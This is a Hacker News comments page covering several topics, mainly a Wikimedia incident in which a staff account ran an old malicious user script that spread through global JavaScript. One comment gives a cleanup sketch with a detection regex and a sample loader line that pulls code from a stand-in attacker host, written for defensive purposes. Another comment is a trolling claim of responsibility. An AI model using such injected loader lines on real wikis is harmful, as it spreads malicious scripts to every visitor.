Hacker News | tux3's comments

Of course, recurring payments work completely differently. A shockingly large fraction of recurring payments come from people who never got around to cancelling them. They're already getting what they want; any email just risks disturbing that situation.

I still get a yearly email summary of my donations. They don't need to send more, and they could simply not send it if their objective were to stay under the radar.

That could be true. I guess I could try giving a one-time donation from another account and see what happens.

You're absolutely right. That's not just a genius idea; it's a radical new paradigm.

I used to dual-boot windows, but I was too lazy to actually reboot, so naturally I had Virtualbox just boot the physical Windows partition while Linux was running. Which is totally fine!

It's not a real dual boot if you don't boot both partitions at the same time.

As long as you don't install the VirtualBox Guest Additions drivers, that works fine; those would make Windows hang when it boots natively on physical hardware, since there's no longer a hypervisor above to answer the hypercalls.
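For anyone curious, the raw-disk trick is essentially one VBoxManage command. A minimal sketch of building it (the disk path and partition number here are illustrative, adjust for your own setup):

```python
import shlex

def raw_vmdk_cmd(vmdk_path, disk, partitions):
    # "internalcommands createrawvmdk" writes a small .vmdk descriptor
    # that points at the physical disk, so a VM can boot the real
    # partition instead of a disk image.
    return [
        "VBoxManage", "internalcommands", "createrawvmdk",
        "-filename", vmdk_path,
        "-rawdisk", disk,
        "-partitions", partitions,  # restrict the VM to these partitions
    ]

# /dev/sda and partition 2 are placeholders for the Windows partition.
print(shlex.join(raw_vmdk_cmd("win-raw.vmdk", "/dev/sda", "2")))
```

You then attach the generated .vmdk to a VM like any other disk; running VirtualBox with enough privileges to read the raw device is on you.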


> I had Virtualbox just boot the physical Windows partition while Linux was running. Which is totally fine!

I had no idea that this was possible, and I learned something new today. Thank you!


I think Windows refused to do that at some point? So I booted the physical Linux partition from Windows if I needed both at the same time. That's on a laptop that otherwise almost always ran Linux.

It whines about licensing, but I switch between booting my Windows installation bare metal and as a VM all the time.

Yeah. That is a valid use. I mean, this is how I installed Windows to begin with, from Linux via QEMU, onto my other hard drive. I did reboot and test it out, and it worked just fine.

No, this is just what that writing style looks like. Names and acronyms are usually capitalized normally.

I keep being surprised by the magnitude of the disconnect between this place and the other circles of hell. I'd have thought the Venn diagram would have a lot more overlap.


Oh, the Venn diagram overlap might be big; the HN population just has a lot of variance, I think, and is less of a community per se. I don't doubt what you're saying, though in the grand scheme of things, I think the "too lazy to hit shift" population dwarfs any of these groups.

Yeah, I can agree with the variance. Except that the "too lazy to hit shift" community is not something I would ever confuse with people writing long form articles about their regex engine research that they'll be presenting at PLDI.

The confusion might be understandable for people who have never encountered this style before, but that's still a very uncharitable take about an otherwise pretty interesting article.


This does a terrible job of explaining it, but it seems to be in protest of age verification laws reaching into operating systems.

The only commit is removing a user birthday field.


The existence of the user birthday field is mass surveillance, but the GECOS field, which contains your full name and street address, and the username, which often contains parts of your name and is mandatory, somehow are not. Full access to your home directory, which includes all of your passwords and usernames and confidential data, also somehow is not an invasion of privacy.

Correct, because putting additional data in GECOS is completely optional. This isn't about having your email client know your birthday, it's about phoning home to gate functionality. Verifiability, attestability, all the loopholes that you think make this harmless are the croaks of a frog that is unjustifiably confident that the water in the pot won't continue getting hotter.

Putting your birthday in the birthday field is completely optional.

0.1 is of course a real number, but let A \in R the set of actual numbers... (/s)

The funny thing is, according to infinitists, real numbers are not real. But I do like the concept of the set of actual numbers.

I don't know whether I'm an infinitist, but I personally think "real numbers" is the most ingenious marketing term created by mathematicians...

\infty is an actual number not in R

Should be \subset.

The goal isn't to improve the AI performance using the cheat sheet, it's to produce a cheat sheet at all that efficiently distills intuition about these 22 million results.

Presumably if it's written in plain text and useful to the AI, there may be some relevant information in there that will be interesting for humans too.


As I say, I understand the goal of having a cheat sheet that distills a big chunk of math. But that distillation would have been better done by a neural network (via fine-tuning or pure distillation) than by the creation of a prompt. Studying that neural network would be harder, though.

It's explicitly stated that the goal is to improve the performance of cheap models, but I assume, like you did, that they are hoping the plain text may be useful to humans too.


Tao does state his hopes in the article: "My hope is that the winning submissions will capture the most productive techniques for solving these problems, and/or provide general problem-solving techniques that would also be applicable to other types of mathematical problems."

I think your suggestions are actually complementary. Distillation of the larger networks capable of solving these problems and study of the layers could be part of the process for generating the cheat sheet.


Wait, y'all are getting paid?


See the public phab ticket: https://phabricator.wikimedia.org/T419143

In short, a Wikimedia Foundation account was doing some sort of test which involved loading a large number of user scripts. They decided to just start loading random user scripts, instead of creating some just for this test.

The user who ran this test is a Staff Security Engineer at WMF, and naturally they decided to do this test under their highly-privileged Wikimedia Foundation staff account, which has permissions to edit the global CSS and JS that runs on every page.

One of those random scripts was a 2-year-old malicious script from ruwiki. This script injects itself into the global JavaScript on every page, and then into the user scripts of any user who runs into it, so it started spreading and doing damage really fast. This triggered tons of alerts, until the decision was made to turn the wiki read-only.


This is a pretty egregious failure for a staff security engineer


It's a pretty egregious failure for the org because it controlled the conditions for it to happen.

The security guy is just the patsy because he actioned it.

They have obviously done this a million times before and now they got burned.


Yes, this. That same engineer shouldn’t have a pocket nuclear trigger shaped just like their key fob, either. Humans are predictable.


Aren’t staff part of engineering leadership?


At my job, I would just say they are in the ear of engineering leadership, but are not part of it.


That makes sense. I guess I usually think of developing policies for this kind of thing to be pretty much what staff would do. I don’t usually expect the CTO to make decisions about how to do testing. To the extent the engineering leadership are to blame, it’s that they were the ones who hired/retained this guy. The buck ultimately stops with them to be sure, but making these kinds of policies seems within the remit of a staff eng.


As a staff engineer, you can't even imagine what his salary is for screwing up like that.

That being said, interesting to see how salaries skyrocketed over the years: https://meta.wikimedia.org/wiki/Wikimedia_Foundation_salarie... but not that much for engineering.


The highest non-severance number is $512,179 for the CEO in 2022. That's not particularly extreme. It's ~1/10 of what the Mozilla Foundation CEO makes.


that's insane...I am not donating anymore (not that I gave that much.)


With all their donation begging, nothing will change; they will still spend money on useless seminars and continue to underfund security by hiring low-paid web amateurs to do the important work.


Pretty much the definition of a “career limiting event”


It's either a Career Limiting Event, or a Career Learning Event.

In the case of a Learning event, you keep your job, and take the time to make the environment more resilient to this kind of issue.

In the case of a Limiting event, you lose your job, and get hired somewhere else for significantly better pay, and make the new environment more resilient to this kind of issue.

Hopefully the Wikimedia foundation is the former.


Realistically, there’s a third option which it would be glib to not consider: you lose your job, get hired somewhere else, and screw up in some novel and highly avoidable way because deep down you aren’t as diligent or detail-oriented as you think you are.


This is the most likely outcome


In the average real world, the staff engineer learns nothing, regardless of whether they get to lose or keep their job. Some time down the line, they make other careless mistakes. Eventually they retire, having learned nothing.

This is more common than you'd think.


I was able to run some stats at scale on this, and people who make mistakes are more likely to make more mistakes, not less. Essentially you're sampling from a distribution of propensity for mistakes, and that dominated any sign of learning from mistakes. Someone who repeatedly makes mistakes is not repeatedly learning; they are accident-prone.


My impression of mistakes was that they were an indicator of someone who was doing a lot of work. They're not necessarily making mistakes at a higher rate per unit of work, they just do more of both per unit of time.

From that perspective, it makes sense that the people who made the most mistakes in the past will also make the most mistakes in the future, but it's only because the people who did the most work in the past will do the most work in the future.

If you fire everyone who makes mistakes you'll be left only with the people who never make anything at all.


In this case it was trivial to normalize for work done.

It’s very human to want to be forgiving of mistakes (after all, who hasn’t made any?), but there are different classes of mistakes made by different types of people. Making a mistake doesn’t change what type of person you are; but if you select from the population by sampling those who have already made mistakes, you are biasing your sample in favor of those prone to making them. In my experience any effect of learning is much smaller than this initial bias.
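That selection effect shows up even with zero learning in the model. A toy simulation (the propensities are made up, nothing from the real dataset):

```python
import random

random.seed(0)

# Each worker has a fixed, hidden propensity to err per unit of work.
workers = [random.uniform(0.01, 0.20) for _ in range(10_000)]

def mistakes(p, n=50):
    # Bernoulli trials: each of n work items errs with probability p.
    return sum(random.random() < p for _ in range(n))

observed = [(mistakes(p), p) for p in workers]
flagged = [p for m, p in observed if m > 0]  # "has made a mistake"

avg_all = sum(workers) / len(workers)
avg_flagged = sum(flagged) / len(flagged)
print(avg_flagged > avg_all)  # → True
```

Workers flagged for having made at least one mistake have a higher average propensity than the overall population, purely because flagging selects against the careful ones.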


Can you elaborate? What scale? What kind of mistakes? This sounds quite interesting.


A decade of data from many hundreds of people, a help desk type role where all communication was kept, mostly chat logs and emails. Machine learning with manual validation. The goal was to put a dollar figure on mistakes made, since customers were much more likely to quit and never come back if it was our fault; but also many customers are nothing but a constant pain in the ass, so it was important to distinguish who was right whenever there was a conflict.

Mistakes made per call, like many things, were on a Pareto distribution, so 90% of the mistakes are made by 10% of the people. Identifying and firing those 10% made a huge difference. Some of the ‘mistakes’ were actually a result of corruption and they had management backing as management was enriching themselves at the cost of the company (a pretty common problem) so the initiative was killed after the first round.


This sounds really interesting but possibly qualitatively different than programming/engineering where automated improvements/iterations are part of the job (and what's rewarded)


What if you defined a hard rule from these statistics that "you must fire anyone on their first error"? Wouldn't your company be empty in a rather short timeframe? [Or be composed only of do-nothing people?]


Why would you do that? You’re sampling from a distribution, a single sample only carries a small amount of information, repeat samples compound though.


Or they are working in a very badly designed system which consistently encourages them to make mistakes


They'll be fine, recruiters don't look this stuff up and generally background checks only care about illegal shit.


Nobody is going to know who did this, so probably not career limiting in any major way.


They named him in the support ticket linked here somewhere.

> sbassett


[flagged]


Is ok, the AI was going to replace them in a few weeks anyway.


Didn't realise this was some historic evil script and not some active attacker who could change tack at any moment.

That makes the fix pretty easy. Write a regex to detect the evil script, and revert every page to a historic version without the script.
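A sketch of what that revert pass could look like (the signature regex and the page history here are made up placeholders; a real cleanup would match the actual payload and walk revisions through the MediaWiki API):

```python
import re

# Hypothetical signature of the injected loader; the real worm's
# payload would need its own pattern.
EVIL_RE = re.compile(r"mw\.loader\.load\(['\"]https?://evil", re.I)

def last_clean_revision(revisions):
    """revisions: newest-first list of (rev_id, wikitext).
    Return the id of the newest revision without the payload,
    or None if every stored revision is infected."""
    for rev_id, text in revisions:
        if not EVIL_RE.search(text):
            return rev_id
    return None

history = [
    (103, "mw.loader.load('https://evil.example/x.js')"),
    (102, "mw.loader.load('https://evil.example/x.js')"),
    (101, "/* legit user script */"),
]
print(last_clean_revision(history))  # → 101
```

Since wiki pages keep full history, the fix really is "find the newest revision that doesn't match, revert to it" for every infected script page.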


Letting ancient evil code run? Have we learned nothing from A Fire Upon the Deep?!


Link to the Prologue of Fire Upon the Deep: https://www.baen.com/Chapters/-0812515285/A_Fire_Upon_the_De...

It's very short and from one of my favorite books. Increasingly relevant.


I swear, I respect Vinge more and more for how well he used his understanding of human tendencies to plot some plausible trajectories for our civilization.


There's a little throwaway thing in the book (or maybe it was in the prequel) that I always liked, re understanding human tendencies. They're still using Unix time, starting in Jan 1st 1970, but given that their culture is so space-travel-focused they assume the early humans set it to coincide with man's first trip to the moon.


That's from the prequel, A Deepness in the Sky. (Which is also excellent.)


A Deepness in the Sky probably has the first sci-fi alien I read who didn't feel like a human wearing an alien suit.

Fantasy sometimes does this better but usually with specific tropes.


If you liked that and you haven't read it yet, give "Dragon's Egg" by Robert L. Forward a read.


I wish he could have seen the current state of GenAI. Several times in the book he talks about how the ship understands context clues and sarcasm, and that effective natural language translation requires near-sentience.


"It was really just humans playing with an old library. It should be safe, using their own automation, clean and benign.

This library wasn't a living creature, or even possessed of automation (which here might mean something more, far more, than human)."


\(^O^)/ zones of thought mentioned \(^O^)/


Do you remember the part where they built a machine in the Transcend that had to work at the Bottom of the Beyond?

The other day I was using Claude for a task, but it occurred to me, what if Claude is unreachable.

So, I told it to "encode your wisdom into this script in case you are not available"

That was my own version of that


Legitimately listening to this book for the first time after a coworker recommended it. It's rapidly becoming one of my favorite books that balances the truly alien with the familiar just right.

Not so ironically, it came up when we were discussing "software archeology".


Learning from fiction? Let's learn from Dune then and start the Butlerian Jihad already.


I've only just heard of it. But, I already knew to not run random scripts under a privileged account. And thank you for the book suggestion - I'm into those kinds of tales.


I love that book


Army of Darkness?

The Mummy?


Are you sure? Are you $150 million ARR sure? Are you $150 million ARR, you'd really like to keep your job, you're not going to accidentally leave a hole or blow up something else, sure?

I agree, mostly, but I'm also really glad I don't have to put out this fire. Cheering them on from the sidelines, though!


Honestly, since I'm never really in a position to see much of that money, at this point I'd be more concerned about my coworkers. And while that typically correlates with the amount of money you either have or receive, they're often out of balance one way or the other.


True but it does say something that such a script was able to lie dormant for so long.


Why would anyone test in production???!!!


Selecting the wrong environment in your test setup by mistake?

I refuse to believe that someone on the security team intentionally tested random user scripts in production.


Once you get big enough… there comes a point where you need to run some code and learn what 100 million people hitting it at once looks like. At that scale, “1 in a million”-class bugs and race conditions literally happen every day. You can’t do that on every PR, so you ship it and prepare to roll back if anything even starts to look fishy. Maybe even just roll it out gradually.

At least, that’s how it worked at literally every big company I worked at so far. The only reason to hold it back is during testing/review. Once enough humans look at it, you release and watch metrics like a hawk.

And yeah, many features were released this way, often gated behind feature flags to control the rollout. When I refactored our email system that sent over a billion notifications a month, it was nerve-wracking. You can’t unsend an email, and hundreds of millions would likely have been sent before we noticed a problem at scale.
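The flag gating itself is usually just a stable hash bucket per user; a generic sketch of the common pattern (not any particular company's implementation):

```python
import hashlib

def flag_enabled(flag, user_id, rollout_pct):
    # Hash flag+user so each user lands in a stable bucket in [0, 100);
    # ramping rollout_pct up only ever adds users, it never flip-flops
    # anyone in and out of the feature between requests.
    h = hashlib.sha256(f"{flag}:{user_id}".encode()).digest()
    bucket = int.from_bytes(h[:8], "big") % 100
    return bucket < rollout_pct

print(flag_enabled("new-email-pipeline", "user-42", 100))  # → True
print(flag_enabled("new-email-pipeline", "user-42", 0))    # → False
```

Rolling back is then just setting the percentage to 0, with no deploy needed.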


Yes this is a common release practice.

However this is a different situation as we’re talking about running arbitrarily found third-party scripts. I can’t imagine that was ever intended to be done in production.

Fun story, when I worked at Facebook in the earlier days someone accidentally made a change that effectively set the release flags for every single feature to be live on production. That was a day… we had to completely wipe out memcached to stop the broken features and then the database was hammered to all hell.


I would say you can get to this point far below 100 million people, especially on web. Some people are truly special and have some kind of setup you just can't easily reproduce. But I agree, you do really have to be confident in your ability to control rollout / blast radius, monitor and revert if needed.


> I refuse to believe that someone on the security team intentionally tested random user scripts in production on purpose.

Do I have a bridge to sell you, oh boy


I have never heard of this kind of insane behaviour before.


There are plenty of ways to safely test in production. For one thing you need to limit the scope of your changes.


"Everyone has a test environment. Some are lucky enough to have a separate production environment."


Or just restore from backup across the board. Assuming they do their backups well, this shouldn't be too hard (especially since it's currently in read-only mode, which means no new updates).


> One of those random scripts was a 2 year old malicious script from ruwiki. This script injects itself in the global Javascript on every page, and then in the userscripts of any user that runs into it, so it started spreading and doing damage really fast.

So, like the Samy worm? (https://en.wikipedia.org/wiki/Samy_%28computer_worm%29)


I'm guessing, "1> Hey Claude, your script ran this malicious script!"

"Claude> Yes, you're absolutely right! I'm sorry!"


300 million dollar organization btw


aka tiny, relatively speaking, compared to similar sites with the same user base


wait as a wikipedia user you can just put random JS to some settings and it will just... run? privileged?

this is both really cool and really really insane


It's a MediaWiki feature: there's a set of pages that get treated as JS/CSS and applied for either all users or specifically you. You do need to be an admin to edit the ones that apply to all users.

https://www.mediawiki.org/wiki/Manual:Interface/JavaScript


Yes, you can have your own JS/CSS that's injected into every page. This is pretty useful for widgets, editing tools, or customizing the website's appearance.


It sounds very dangerous to me but who am I to judge.


It's nothing.

For the global ones that need admin permissions to edit, it's no different from all the other code of MediaWiki itself, like the PHP.

For the user scripts, it's no worse than the fact that you can run Tampermonkey in your browser and have it modify every page from every site in whatever way you want.


Well it has just been shown it's not nothing


No it hasn't.


That is how MediaWiki works. Everything is a page, including CSS and JS. It is not really different from including JS in a webpage anywhere else.


It is kind of risky - you now have an entire, mostly unreviewed ecosystem of JavaScript code that users can experiment with.

However, it's been really useful for letting power users customize the interface to their needs. It also acts as a sort of pressure release for when the official devs are too slow to meet needs. At this point Wikipedia has become very dependent on it.


It only affects your user; it’s just like adding random extensions to your browser.


Fundamentally I feel the whole "web", as in anything running in a browser, is insane and broken security-wise. When you allow mostly arbitrary code to run when you load a page... well, it can do mostly arbitrary things, and everyone else needs to protect against it.

And when you have enough rights, you get to add arbitrary code everywhere on your site.


On one hand, I was about to get irrationally angry someone was attacking Wikipedia, so I'm a bit relieved

On the other hand,

>a Staff Security Engineer at WMF, and naturally they decided to do this test under their highly-privileged Wikimedia Foundation staff account

seriously?


To paraphrase Bush,

> our enemies are innovative and resourceful, and so are we. They never stop thinking about new ways to harm our site and our users, and neither do we.


Why am I not surprised that the malicious script was from ruwiki?


>they decided to do this test under their

what language is this?


...wow.


this was us. we pumpin hard. we literall run, as in literally run the organisms of, senior wikimedia staff as well as employees

this is just us playing on the computer, we got b0mbz


No, sincerely calling things cringe is a millennial marker. Cringe was thrown around a lot in the 2010s, but that was a decade and a half ago.

Nowadays you'll hear that cringe is cringe, let people enjoy things, be cringe and be free, etc etc

